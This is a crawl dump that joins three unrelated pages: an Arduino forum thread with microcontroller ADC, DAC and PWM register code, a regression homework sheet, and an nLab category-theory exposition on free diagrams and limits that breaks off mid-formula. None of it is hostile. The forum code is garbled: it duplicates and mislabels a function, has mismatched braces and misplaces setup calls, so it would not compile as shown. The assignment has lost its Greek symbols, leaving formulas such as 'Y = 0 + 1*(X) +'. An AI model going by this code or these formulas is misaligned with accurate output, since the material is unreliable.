[Select]\n`#define BaudRate 460800uint16_t volt;uint8_t flag = 0;volatile uint8_t bufn, Oldbufn, bufn_dac;const uint16_t bufsize = 150;            const uint8_t bufnumber = 1;             const uint8_t _bufnumber = bufnumber - 1;volatile uint16_t buf[bufnumber][bufsize] =...;void setup(){    Serial.begin(BaudRate);  while(!Serial);  // Wait for connection    pinMode(LED_BUILTIN, OUTPUT);  // For ADC debugging  pinMode(12, OUTPUT);           // For DACC debugging      adc_setup();  dac_setup();  tc_adc_setup();  tc_dac_setup();}void loop(){    uint8_t checksum;   if(flag == 1){    //Protocol via Serial    checksum = (uint8_t)(volt >> 8) + (uint8_t)(volt) + (uint8_t)(volt >> 8) + (uint8_t)(volt);  Serial.write(0x02); // Start of text  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);    Serial.write(checksum);    flag = 0 ;  }/*************  Configure adc_setup function  *******************/void dac_setup (){  PMC->PMC_PCER1 = PMC_PCER1_PID38;                   // DACC power ON  DACC->DACC_CR = DACC_CR_SWRST ;                     // Reset DACC  DACC->DACC_MR = DACC_MR_TRGEN_EN                    // Hardware trigger select                  | DACC_MR_TRGSEL(0b011)             // Trigger by TIOA2                  | DACC_MR_TAG_EN                    // Output on DAC0 and DAC1                  | DACC_MR_WORD_HALF                                   | DACC_MR_REFRESH (1)                  | DACC_MR_STARTUP_8                  | DACC_MR_MAXS;  DACC->DACC_ACR = DACC_ACR_IBCTLCH0(0b11) //0b10                   | DACC_ACR_IBCTLCH1(0b11) // 0b10                   | DACC_ACR_IBCTLDACCORE(0b01);  DACC->DACC_IDR = ~DACC_IDR_ENDTX;  DACC->DACC_IER = DACC_IER_ENDTX;                    // TXBUFE works too !!!  NVIC_SetPriority(DACC_IRQn, 0xFF);  NVIC_EnableIRQ(DACC_IRQn);  DACC->DACC_CHER = DACC_CHER_CH0;    // enable channels 0 = DAC0  /*************   configure PDC/DMA  for DAC *******************/  DACC->DACC_TPR  = (uint32_t)buf;                 // DMA buffer  DACC->DACC_TCR  = bufsize;  //DACC->DACC_TNPR = (uint32_t)buf;                 // next DMA buffer  //DACC->DACC_TNCR = bufsize;  bufn_dac = 1;  DACC->DACC_PTCR = DACC_PTCR_TXTEN;                  // Enable PDC Transmit channel request}/*********  Call back function for DAC PDC/DMA **************/void DACC_Handler() {   // DACC_ISR_HANDLER()         // move Sinus/PDC/DMA pointers to next buffer  //if ( DACC->DACC_ISR & DACC_ISR_ENDTX) {           // Useless because the only one  bufn_dac = (bufn_dac + 1) & _bufnumber;  DACC->DACC_TNPR = (uint32_t)buf[bufn_dac];  DACC->DACC_TNCR = bufsize;  }/*************  Configure adc_setup function  *******************/void dac_setup (){  PMC->PMC_PCER1 = PMC_PCER1_PID38;                   // DACC power ON  DACC->DACC_CR = DACC_CR_SWRST ;                     // Reset DACC  DACC->DACC_MR = DACC_MR_TRGEN_EN                    // Hardware trigger select                  | DACC_MR_TRGSEL(0b011)             // Trigger by TIOA2                  | DACC_MR_TAG_EN                    // Output on DAC0 and DAC1                  | DACC_MR_WORD_HALF                                   | DACC_MR_REFRESH (1)                  | DACC_MR_STARTUP_8                  | DACC_MR_MAXS;  DACC->DACC_ACR = DACC_ACR_IBCTLCH0(0b11) //0b10                   | DACC_ACR_IBCTLCH1(0b11) // 0b10                   | DACC_ACR_IBCTLDACCORE(0b01);  DACC->DACC_IDR = ~DACC_IDR_ENDTX;  DACC->DACC_IER = DACC_IER_ENDTX;                    // TXBUFE works too !!!  NVIC_SetPriority(DACC_IRQn, 0xFF);  NVIC_EnableIRQ(DACC_IRQn);  DACC->DACC_CHER = DACC_CHER_CH0;    // enable channels 0 = DAC0  /*************   configure PDC/DMA  for DAC *******************/  DACC->DACC_TPR  = (uint32_t)buf;                 // DMA buffer  DACC->DACC_TCR  = bufsize;  //DACC->DACC_TNPR = (uint32_t)buf;                 // next DMA buffer  //DACC->DACC_TNCR = bufsize;  bufn_dac = 1;  DACC->DACC_PTCR = DACC_PTCR_TXTEN;                  // Enable PDC Transmit channel request}/*********  Call back function for DAC PDC/DMA **************/void DACC_Handler() {   // DACC_ISR_HANDLER()         // move Sinus/PDC/DMA pointers to next buffer  //if ( DACC->DACC_ISR & DACC_ISR_ENDTX) {           // Useless because the only one  bufn_dac = (bufn_dac + 1) & _bufnumber;  DACC->DACC_TNPR = (uint32_t)buf[bufn_dac];  DACC->DACC_TNCR = bufsize;  }`\n\n#### Tyarel", null, "#2\n##### Apr 02, 2019, 08:19 pm\nPWM case code:\n\nCode: [Select]\n`#define BaudRate 460800#define sinsize  (64)                // Sample number (a power of 2 is better)#define PERIOD_VALUE  (4200)        // For a 312.5 Hz sinwave 4200 + 64 samples#define NbCh      (1)                 // Only channel 0 ---> Number of channels = 1#define DUTY_BUFFER_LENGTH      (sinsize * NbCh) // Half wordsuint16_t volt;uint8_t flag = 0;uint16_t Duty_Buffer[DUTY_BUFFER_LENGTH];#define UpdatePeriod_Msk (0b1111)#define UpdatePeriod    (UpdatePeriod_Msk & 0b0000) //Defines the time between each duty cycle update of the synchronous channels//This time equals to (UpdatePeriod + 1) periods of the Reference channel 0uint16_t Sin_Duty[sinsize];void setup () {  //Generate lookup table  for (int i = 0; i < sinsize; i++) {    Sin_Duty[i] = 1 + (2047 * (sin( i * 2 * PI / sinsize ) + 1));  }  for (uint32_t i = 0; i < sinsize; i++) {    Duty_Buffer[i * NbCh + 0] = Sin_Duty[i];    adc_setup();  tc_adc_setup();  PWM_setup();    }  Serial.begin(BaudRate);  while(!Serial);  // Wait for connection}void loop(){    uint8_t checksum;   if(flag == 1){    //Protocol via Serial    checksum = (uint8_t)(volt >> 8) + (uint8_t)(volt) + (uint8_t)(volt >> 8) + (uint8_t)(volt);  Serial.write(0x02); // Start of text  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);    Serial.write(checksum);    flag = 0 ;  }}void PWM_setup(){    PMC->PMC_PCER1 |= PMC_PCER1_PID36;       // PWM controller power ON  PMC->PMC_PCER0 |= PMC_PCER0_PID13;       // PIOC power ON  // PWML0 on PC2, peripheral type B: Pin34  PIOC->PIO_PDR |= PIO_PDR_P2;  PIOC->PIO_ABSR |= PIO_PC2B_PWML0;  // Set synchro channels list : Channel 0  PWM->PWM_DIS = PWM_DIS_CHID0;  PWM->PWM_SCM  = PWM_SCM_SYNC0          // Add SYNCx accordingly, at least SYNC0                  | PWM_SCM_UPDM_MODE2;  //Automatic write of duty-cycle update registers by the PDC DMA  // Set duty cycle update period  PWM->PWM_SCUP = PWM_SCUP_UPR(UpdatePeriod);  // Set the PWM Reference channel 0 i.e. : Clock/Frequency/Alignment  PWM->PWM_CLK = PWM_CLK_PREA(0b0000) | PWM_CLK_DIVA(1);        // Set the PWM clock rate for 84 MHz/1  PWM->PWM_CH_NUM.PWM_CMR = PWM_CMR_CPRE_CLKA;               // The period is left aligned, clock source as CLKA on channel 0  PWM->PWM_CH_NUM.PWM_CPRD = PERIOD_VALUE;                   // Set the PWM frequency (84MHz/1)/PERIOD_VALUE Hz  /****  Final frequency = MCK/DIVA/PRES/CPRD/(UPR + 1)/sinsize  ****/  // Set Interrupt events  PWM->PWM_IER2 = PWM_IER2_WRDY;   //Write Ready for Synchronous Channels Update Interrupt Enable  //synchro with ENDTX End of TX Buffer Interrupt Enable  // Fill duty cycle buffer for channels 0, x, y ...  // Duty_Buffer is a buffer of Half Words(H_W) composed of N lines which structure model for each duty cycle update is :  // [ H_W: First synchro channel 0 duty cycle **Mandatory** ]/[ H_W: Second synchro channel duty cycle ] ... and so on    PWM->PWM_ENA = PWM_ENA_CHID0;                  // Enable PWM for all channels, channel 0 Enable is sufficient  PWM->PWM_TPR  = (uint32_t)Duty_Buffer;        // FIRST DMA buffer  PWM->PWM_TCR  = DUTY_BUFFER_LENGTH;           // Number of Half words  //PWM->PWM_TNPR = (uint32_t)Duty_Buffer;        // Next DMA buffer  //PWM->PWM_TNCR = DUTY_BUFFER_LENGTH;  PWM->PWM_PTCR = PWM_PTCR_TXTEN;               // Enable PDC Transmit channel request    NVIC_EnableIRQ(PWM_IRQn);  NVIC_SetPriority(PWM_IRQn, 0x01);  }void PWM_Handler() {  // move PDC DMA pointers to next buffer  PWM->PWM_ISR2;      // Clear status register  PWM->PWM_TNPR = (uint32_t)Duty_Buffer;  PWM->PWM_TNCR = DUTY_BUFFER_LENGTH;}}/*******  Timer Counter 0 Channel 1 to generate PWM pulses thru TIOA1  for ADC ********/void tc_adc_setup() {   PMC->PMC_PCER0 |= PMC_PCER0_PID28;                      // TC1 power ON : Timer Counter 0 channel 1  TC0->TC_CHANNEL.TC_CMR = TC_CMR_TCCLKS_TIMER_CLOCK2  // MCK/8, clk on rising edge                              | TC_CMR_WAVE               // Waveform mode                              | TC_CMR_WAVSEL_UP_RC       // UP mode with automatic trigger on RC Compare                              | TC_CMR_ACPA_CLEAR         // Clear TIOA1 on RA compare match                              | TC_CMR_ACPC_SET;          // Set TIOA1 on RC compare match  TC0->TC_CHANNEL.TC_RC = 1000;  //<********************   Frequency = (Mck/8)/TC_RC  Hz = 4000 Hz -> Adc can be sampled less frequently because  a range of 5 values verify the if caluse in adchandler  TC0->TC_CHANNEL.TC_RA = 20;    //<********************   Any Duty cycle in between 1 and TC_RC  TC0->TC_CHANNEL.TC_CCR = TC_CCR_CLKEN;               // TC1 enable}`\n\n#### Tyarel", null, "#3\n##### Apr 02, 2019, 08:27 pm\nADC code which is the same for both cases, I apologize but the limit of words forced me to split the code in different posts\n\nCode: [Select]\n`/*************  Configure adc_setup function  *******************/void adc_setup() {  PMC->PMC_PCER1 |= PMC_PCER1_PID37;                    // ADC power ON  ADC->ADC_CR = ADC_CR_SWRST;                           // Reset ADC  ADC->ADC_MR |=  ADC_MR_TRGEN_EN                       // Hardware trigger select                  | ADC_MR_TRGSEL_ADC_TRIG2             // Trigger by TIOA1                  | ADC_MR_PRESCAL(1);  //ADC->ADC_ACR = ADC_ACR_IBCTL(0b01);                 // For frequencies > 500 KHz  ADC->ADC_IDR = ~ADC_IDR_EOC7;  ADC->ADC_IER = ADC_IER_EOC7;                          // End Of Conversion interrupt enable for channel 7  NVIC_EnableIRQ(ADC_IRQn);                             // Enable ADC interrupt  NVIC_SetPriority(ADC_IRQn, 0x00);  ADC->ADC_CHER = ADC_CHER_CH5 | ADC_CHER_CH6 | ADC_CHER_CH7;               // Enable Channels 7 = A0 and 6 = A1, 5 A2; Trigger frequency is multiplied by 3                                                                            // The sampling frequency for 1 channel times the number of channels !!  adc_start(ADC);  }/*********  Call back function for ADC Int **************/void ADC_Handler () {  while(!(((ADC->ADC_ISR & ADC_ISR_EOC7) && (ADC->ADC_ISR & ADC_ISR_EOC6) && (ADC->ADC_ISR & ADC_ISR_EOC5))));    if((*(ADC -> ADC_CDR+7) > 5) && (*(ADC -> ADC_CDR+7) < 2650)){ // range from 0.041 to 2.28V - > peak when ADC measures xxx      volt = *(ADC -> ADC_CDR+6); //max value after filter: 3.3V ok      volt = *(ADC -> ADC_CDR+5);      flag = 1;  }  }/*******  Timer Counter 0 Channel 1 to generate PWM pulses thru TIOA1  for ADC ********/void tc_adc_setup() {   PMC->PMC_PCER0 |= PMC_PCER0_PID28;                      // TC1 power ON : Timer Counter 0 channel 1  TC0->TC_CHANNEL.TC_CMR = TC_CMR_TCCLKS_TIMER_CLOCK2  // MCK/8, clk on rising edge                              | TC_CMR_WAVE               // Waveform mode                              | TC_CMR_WAVSEL_UP_RC       // UP mode with automatic trigger on RC Compare                              | TC_CMR_ACPA_CLEAR         // Clear TIOA1 on RA compare match                              | TC_CMR_ACPC_SET;          // Set TIOA1 on RC compare match  TC0->TC_CHANNEL.TC_RC = 1000;  //<********************   Frequency = (Mck/8)/TC_RC  Hz = 4000 Hz -> Adc can be sampled less frequently because  a range of 5 values verify the if caluse in adchandler  TC0->TC_CHANNEL.TC_RA = 20;    //<********************   Any Duty cycle in between 1 and TC_RC  TC0->TC_CHANNEL.TC_CCR = TC_CCR_CLKEN;               // TC1 enable}`\n\nGo Up" ]
[ null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.96433836,"math_prob":0.8812467,"size":901,"snap":"2019-35-2019-39","text_gpt3_token_len":208,"char_repetition_ratio":0.09141583,"word_repetition_ratio":0.0,"special_character_ratio":0.22530521,"punctuation_ratio":0.098958336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95942056,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-19T16:55:51Z\",\"WARC-Record-ID\":\"<urn:uuid:65afc796-e2a2-4778-ac0d-9d83a7341a26>\",\"Content-Length\":\"44538\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0960cedb-b089-4053-8b5f-f47b18461846>\",\"WARC-Concurrent-To\":\"<urn:uuid:88ab5a5e-bb97-4f73-a8f6-74fdfa683120>\",\"WARC-IP-Address\":\"104.20.191.47\",\"WARC-Target-URI\":\"https://forum.arduino.cc/index.php?topic=607595.0\",\"WARC-Payload-Digest\":\"sha1:SJ2OFPLKOUZS5CE6EIKYNDPLN6GLMK5M\",\"WARC-Block-Digest\":\"sha1:Q3Z2VPVSWKSSJHYRUW4GZRIFRDVGBML5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027314852.37_warc_CC-MAIN-20190819160107-20190819182107-00355.warc.gz\"}"}
https://studylib.net/doc/6608716/assignment-2
[ "# Assignment 2", null, "```BSAD 6312 Regression Assignment 2\nA. Using the handout distributed in class; answer the following for the model below:\nY = 0 + 1*(X) + \n\n Answer “Is it appropriate to interpret b0? Why or why not?” If so, test (using the\noutput) H0:0 = 0 vs. the alternative H1:0 &lt;&gt; 0. If so, construct (using the output) and interpret\nin context a 95% confidence interval estimate for 0.\n2. Test H0:1 = 0 vs. the alternative H1:1 &lt;&gt; 0. Construct and interpret in context a 95%\nconfidence interval estimate for 1.\n3. Interpret in context the coefficient of determination.\n4. For the value of X in the first observation, construct and interpret in context a 95%\nconfidence interval estimate for y|x1.\n5. For the value of X in the last observation, construct and interpret in context a 95%\nprediction interval for Y|x1.\nB. Using the software of your choice, perform a simple regression with the UBSprices data and" ]
[ null, "https://s3.studylib.net/store/data/006608716_1-42f2b0d4df83af025f037f9c3a0b824e.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73904735,"math_prob":0.91870344,"size":1358,"snap":"2020-45-2020-50","text_gpt3_token_len":344,"char_repetition_ratio":0.12924668,"word_repetition_ratio":0.1440678,"special_character_ratio":0.26215023,"punctuation_ratio":0.15679443,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9933966,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-25T03:29:20Z\",\"WARC-Record-ID\":\"<urn:uuid:16a480a6-4675-4f99-9fa4-e0447fe9121d>\",\"Content-Length\":\"67671\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ddc92cfb-0f71-4bb5-99e7-a2f940132f3b>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a489c50-d750-4648-9bad-ed8e31581a7f>\",\"WARC-IP-Address\":\"104.24.125.188\",\"WARC-Target-URI\":\"https://studylib.net/doc/6608716/assignment-2\",\"WARC-Payload-Digest\":\"sha1:ROGR6V6EPNGU6G45UQVHAAOM3MPHFEZS\",\"WARC-Block-Digest\":\"sha1:QOXRIC5O44YTG2DB3PJDHDSTAQY4J77F\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107885126.36_warc_CC-MAIN-20201025012538-20201025042538-00472.warc.gz\"}"}
https://www.degruyter.com/view/journals/zna/36/4/article-p417.xml?currency=GBP
[ "# A Note on the Liouville Equation\n\nA. Grauel 1\n• 1 Fachbereich 6 der Universität-Gesamthochschule Paderborn\n\nWe study some geometrical features of the non-linear scattering equations . From this we deduce the Liouville equation. For that we interpret the SL(2, ℝ)-valued elements of the matrices in the scattering equations as matrix-valued forms and calculate the curvature 2-form with respect to a basis of the Lie algebra. We obtain the Liouville equation if the curvature form is equal to zero\n\nIf the inline PDF is not rendering correctly, you can download the PDF file here.\n\nOPEN ACCESS\n\n### Zeitschrift für Naturforschung A\n\nA Journal of Physical Sciences: Zeitschrift für Naturforschung A (ZNA) is an international scientific journal which publishes original research papers from all areas of experimental and theoretical physics. In accordance with the name of the journal, which means “Journal for Natural Sciences”, manuscripts submitted to ZNA should have a tangible connection to actual physical phenomena.\n\n### Search", null, "", null, "", null, "" ]
[ null, "https://d26hddpfm66duo.cloudfront.net/assets/08c8e1c045dc2b34c9e3b1c154429c5995f19f36/core/spacer.gif", null, "https://d26hddpfm66duo.cloudfront.net/assets/08c8e1c045dc2b34c9e3b1c154429c5995f19f36/core/spacer.gif", null, "https://d26hddpfm66duo.cloudfront.net/assets/08c8e1c045dc2b34c9e3b1c154429c5995f19f36/core/spacer.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85341465,"math_prob":0.71959805,"size":779,"snap":"2020-34-2020-40","text_gpt3_token_len":155,"char_repetition_ratio":0.118709676,"word_repetition_ratio":0.0,"special_character_ratio":0.18100129,"punctuation_ratio":0.06818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9672322,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-11T22:24:37Z\",\"WARC-Record-ID\":\"<urn:uuid:de0c9659-9bb2-4244-83a8-fd1652e9c67a>\",\"Content-Length\":\"263991\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8075b09c-7897-402e-97c6-d4a1bfd69029>\",\"WARC-Concurrent-To\":\"<urn:uuid:95b62d80-c174-41a9-9011-f50ae0fedbb4>\",\"WARC-IP-Address\":\"52.17.168.29\",\"WARC-Target-URI\":\"https://www.degruyter.com/view/journals/zna/36/4/article-p417.xml?currency=GBP\",\"WARC-Payload-Digest\":\"sha1:I4EBSAUEVQS7MF57IC5OJANM6VYJ64RS\",\"WARC-Block-Digest\":\"sha1:G5OROKTDUFNCDVCABQ67KL6G32V4PUQ3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439738855.80_warc_CC-MAIN-20200811205740-20200811235740-00004.warc.gz\"}"}
https://ncatlab.org/nlab/show/free+diagram
[ "Contents\n\ncategory theory\n\n# Contents\n\n## Idea\n\nA free diagram in a category $\\mathcal{C}$ is a particularly simple special case of the general concept of a diagram $X_\\bullet \\;\\colon\\; \\mathcal{I} \\to \\mathcal{C}$, namely the case where the shape $\\mathcal{I}$ of the diagram is a free category.\n\nMany important types of limits and colimits are over free diagrams, for instance products/coproducts, equalizers/coequalizers, pullbacks/pushouts, sequential limits/sequential colimits.\n\nDue to the simplicity of the concept of free diagrams, these types of limits and colimits may be discussed in a very low-brow way, without even making the concept of category and functor explicit. For this see the Exposition below.\n\n## Definition\n\nRecall that\n\n###### Definition\n\n(diagram)\n\nFor $\\mathcal{C}$ a category, then a diagram in $\\mathcal{C}$ is\n\n1. a small category $\\mathcal{I}$ , the shape of the diagram;\n\n2. a functor $X_\\bullet \\;\\colon\\; \\mathcal{I} \\to \\mathcal{C}$.\n\n###### Definition\n\n(free category)\n\n$Cat \\underoverset {\\underset{Underlying}{\\longrightarrow}} {\\overset{Free}{\\longleftarrow}} {\\bot} DirGraph$\n\nbetween the 1-categories of categories and that of directed graphs.\n\nA free category is one in the image of this left adjoint functor $Free \\colon DirGraph \\to Cat$ (sometimes called a “path category”).\n\n###### Definition\n\n(free diagram)\n\nA free diagram in a category $\\mathcal{C}$ is a diagram in $\\mathcal{C}$ (def. ) whose shape is a free category (def. ).\n\nIn other words, a free diagram in $\\mathcal{C}$ is\n\n1. a directed graph $I$;\n\n2. a functor of the form $X_\\bullet \\;\\colon\\; Free(I) \\to \\mathcal{C}$.\n\n## Examples\n\n###### Example\n\nTypes of free diagrams that are commonly encountered in practice, as well as the names of the limits/colimits over them are shown in the following table\n\n## Exposition\n\nWe give an exposition of free diagrams, and their cones and limits, intentionally avoiding abstract category-theoretic language, expressing everything just in components. See also at limits and colimits by example.\n\nFor concreteness, we speak only of diagrams of sets and of topological spaces in the following:\n\n###### Definition\n\n(free diagram of sets/topological spaces)\n\nA free diagram $X_\\bullet$ of sets or of topological spaces is\n\n1. a set $\\{ X_i \\}_{i \\in I}$ of sets or of topological spaces, respectively;\n\n2. for every pair $(i,j) \\in I \\times I$ of labels, a set $\\{ X_i \\overset{ f_\\alpha }{\\longrightarrow} X_j\\}_{\\alpha \\in I_{i,j}}$ of functions of of continuous functions, respectively, between these.\n\n###### Example\n\n(discrete diagram and empty diagram)\n\nLet $I$ be any set, and for each $(i,j) \\in I \\times I$ let $I_{i,j} = \\emptyset$ be the empty set.\n\nThe corresponding free diagrams (def. ) are simply a set of sets/topological spaces with no specified (continuous) functions between them. This is called a discrete diagram.\n\nFor example for $I = \\{1,2,3\\}$ the set with 3-elements, then such a diagram looks like this:\n\n$X_1 \\phantom{AAA} X_2 \\phantom{AAA} X_3 \\,.$\n\nNotice that here the index set may be empty set, $I = \\emptyset$, in which case the corresponding diagram consists of no data. This is also called the empty diagram.\n\n###### Definition\n\n(parallel morphisms diagram)\n\nLet $I = \\{a, b\\}$ be the set with two elements, and consider the sets\n\n$I_{i,j} \\;\\coloneqq\\; \\left\\{ \\array{ \\{ 1,2 \\} & \\vert & (i = a) \\,\\text{and}\\, (j = b) \\\\ \\emptyset & \\vert & \\text{otherwise} } \\right\\} \\,.$\n\nThe corresponding free diagrams (def. ) are called pairs of parallel morphisms. They may be depicted like so:\n\n$X_a \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {\\phantom{AAAAA}} X_b \\,.$\n###### Example\n\n(span and cospan diagram)\n\nLet $I = \\{a,b,c\\}$ the set with three elements, and set\n\n$I_{i ,j} = \\left\\{ \\array{ \\{f_1\\} & \\vert \\, (i = c) \\,\\text{and}\\, (j = a) \\\\ \\{f_2\\} & \\vert \\, (i = c) \\,\\text{and}\\, (j = b) \\\\ \\emptyset & \\vert \\, \\text{otherwise} } \\right.$\n\nThe corresponding free diagrams (def. ) look like so:\n\n$\\array{ && X_c \\\\ & {}^{\\mathllap{f_1}}\\swarrow && \\searrow^{\\mathrlap{f_2}} \\\\ X_a && && X_b } \\,.$\n\nThese are called span diagrams.\n\nSimilary, there is the cospan diagram of the form\n\n$\\array{ && X_c \\\\ & {}^{\\mathllap{f_1}}\\nearrow && \\nwarrow^{\\mathrlap{f_2}} \\\\ X_a && && X_b } \\,.$\n###### Example\n\n(tower diagram)\n\nLet $I = \\mathbb{N}$ be the set of natural numbers and consider\n\n$I_{i,j} \\;\\coloneqq\\; \\left\\{ \\array{ \\{f_{i,j}\\} & \\vert & i \\leq j \\\\ \\emptyset & \\vert & \\text{otherwise} } \\right.$\n\nThe corresponding free diagrams (def. ) are called tower diagrams. They look as follows:\n\n$X_0 \\overset{\\phantom{A}f_{0,1} \\phantom{A} }{\\longrightarrow} X_1 \\overset{\\phantom{A} f_{1,2} \\phantom{A} }{\\longrightarrow} X_2 \\overset{\\phantom{A} f_{2,3} \\phantom{A} }{\\longrightarrow} X_3 \\overset{}{\\longrightarrow} \\cdots \\,.$\n\nSimilarly there are co-tower diagram\n\n$X_0 \\overset{\\phantom{A} f_{0,1} \\phantom{A} }{\\longleftarrow} X_1 \\overset{\\phantom{A} f_{1,2} \\phantom{A}}{\\longleftarrow} X_2 \\overset{\\phantom{A} f_{2,3} \\phantom{A}}{\\longleftarrow} X_3 \\overset{}{\\longleftarrow} \\cdots \\,.$\n\n$\\,$\n\n###### Definition\n\n(cone over a free diagram)\n\nConsider a free diagram of sets or of topological spaces (def. )\n\n$X_\\bullet \\,=\\, \\left\\{ X_i \\overset{f_\\alpha}{\\longrightarrow} X_j \\right\\}_{i,j \\in I, \\alpha \\in I_{i,j}} \\,.$\n\nThen\n\n1. a cone over this diagram is\n\n1. a set or topological space $\\tilde X$ (called the tip of the cone);\n\n2. for each $i \\in I$ a function or continuous function $\\tilde X \\overset{p_i}{\\longrightarrow} X_i$\n\nsuch that\n\n• for all $(i,j) \\in I \\times I$ and all $\\alpha \\in I_{i,j}$ then the condition\n\n$f_{\\alpha} \\circ p_i = p_j$\n\nholds, which we depict as follows:\n\n$\\array{ && \\tilde X \\\\ & {}^{\\mathllap{p_i}}\\swarrow && \\searrow^{\\mathrlap{p_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j }$\n2. a co-cone over this diagram is\n\n1. a set or topological space $\\tilde X$ (called the tip of the co-cone);\n\n2. for each $i \\in I$ a function or continuous function $q_i \\colon X_i \\longrightarrow \\tilde X$;\n\nsuch that\n\n• for all $(i,j) \\in I \\times I$ and all $\\alpha \\in I_{i,j}$ then the condition\n\n$q_j \\circ f_{\\alpha} = q_i$\n\nholds, which we depict as follows:\n\n$\\array{ X_i && \\overset{f_\\alpha}{\\longrightarrow} && X_j \\\\ & {}_{\\mathllap{q_i}}\\searrow && \\swarrow_{\\mathrlap{q_j}} \\\\ && \\tilde X } \\,.$\n###### Example\n\n(solutions to equations are cones)\n\nLet $f,g \\colon \\mathbb{R} \\to \\mathbb{R}$ be two functions from the real numbers to themselves, and consider the corresponding parallel morphism diagram of sets (example ):\n\n$\\mathbb{R} \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {\\phantom{AAAAA}} \\mathbb{R} \\,.$\n\nThen a cone (def. ) over this free diagram with tip the singleton set $\\ast$ is a solution to the equation $f(x) = g(x)$\n\n$\\array{ && \\ast \\\\ & {}^{\\mathllap{const_x}}\\swarrow && \\searrow^{\\mathrlap{const_y}} \\\\ \\mathbb{R} && \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {\\phantom{AAAAA}} && \\mathbb{R} } \\,.$\n\nNamely the components of the cone are two functions of the form\n\n$cont_x, const_y \\;\\colon\\; \\ast \\to \\mathbb{R}$\n\nhence equivalently two real numbers, and the conditions on these are\n\n$f_1 \\circ const_x = const_y \\phantom{AAAA} f_2 \\circ const_x = const_y \\,.$\n###### Definition\n\n(limiting cone over a diagram)\n\nConsider a free diagram of sets or of topological spaces (def. ):\n\n$\\left\\{ X_i \\overset{f_\\alpha}{\\longrightarrow} X_j \\right\\}_{i,j \\in I, \\alpha \\in I_{i,j}} \\,.$\n\nThen\n\n1. its limiting cone (or just limit for short, also “inverse limit”, for historical reasons) is the cone\n\n$\\left\\{ \\array{ && \\underset{\\longleftarrow}{\\lim}_k X_k \\\\ & {}^{\\mathllap{p_i}}\\swarrow && \\searrow^{\\mathrlap{p_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\right\\}$\n\nover this diagram (def. ) which is universal among all possible cones, in that for\n\n$\\left\\{ \\array{ && \\tilde X \\\\ & {}^{\\mathllap{p'_i}}\\swarrow && \\searrow^{\\mathrlap{p'_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\right\\}$\n\nany other cone, then there is a unique function or continuous function, respectively\n\n$\\phi \\;\\colon\\; \\tilde X \\overset{}{\\longrightarrow} \\underset{\\longrightarrow}{\\lim}_i X_i$\n\nthat factors the given cone through the limiting cone, in that for all $i \\in I$ then\n\n$p'_i = p_i \\circ \\phi$\n\nwhich we depict as follows:\n\n$\\array{ \\tilde X \\\\ {}^{\\mathllap{ \\exists !\\, \\phi}}\\downarrow & \\searrow^{\\mathrlap{p'_i}} \\\\ \\underset{\\longrightarrow}{\\lim}_i X_i &\\underset{p_i}{\\longrightarrow}& X_i }$\n2. its colimiting cocone (or just colimit for short, also “direct limit”, for historical reasons) is the cocone\n\n$\\left\\{ \\array{ X_i && \\overset{f_\\alpha}{\\longrightarrow} && X_j \\\\ & {}^{\\mathllap{q_i}}\\searrow && \\swarrow^{\\mathrlap{q_j}} \\\\ \\\\ && \\underset{\\longrightarrow}{\\lim}_i X_i } \\right\\}$\n\nunder this diagram (def. ) which is universal among all possible co-cones, in that it has the property that for\n\n$\\left\\{ \\array{ X_i && \\overset{f_\\alpha}{\\longrightarrow} && X_j \\\\ & {}^{\\mathllap{q'_i}}\\searrow && \\swarrow_{\\mathrlap{q'_j}} \\\\ && \\tilde X } \\right\\}$\n\nany other cocone, then there is a unique function or continuous function, respectively\n\n$\\phi \\;\\colon\\; \\underset{\\longrightarrow}{\\lim}_i X_i \\overset{}{\\longrightarrow} \\tilde X$\n\nthat factors the given co-cone through the co-limiting cocone, in that for all $i \\in I$ then\n\n$q'_i = \\phi \\circ q_i$\n\nwhich we depict as follows:\n\n$\\array{ X_i &\\overset{q_i}{\\longrightarrow}& 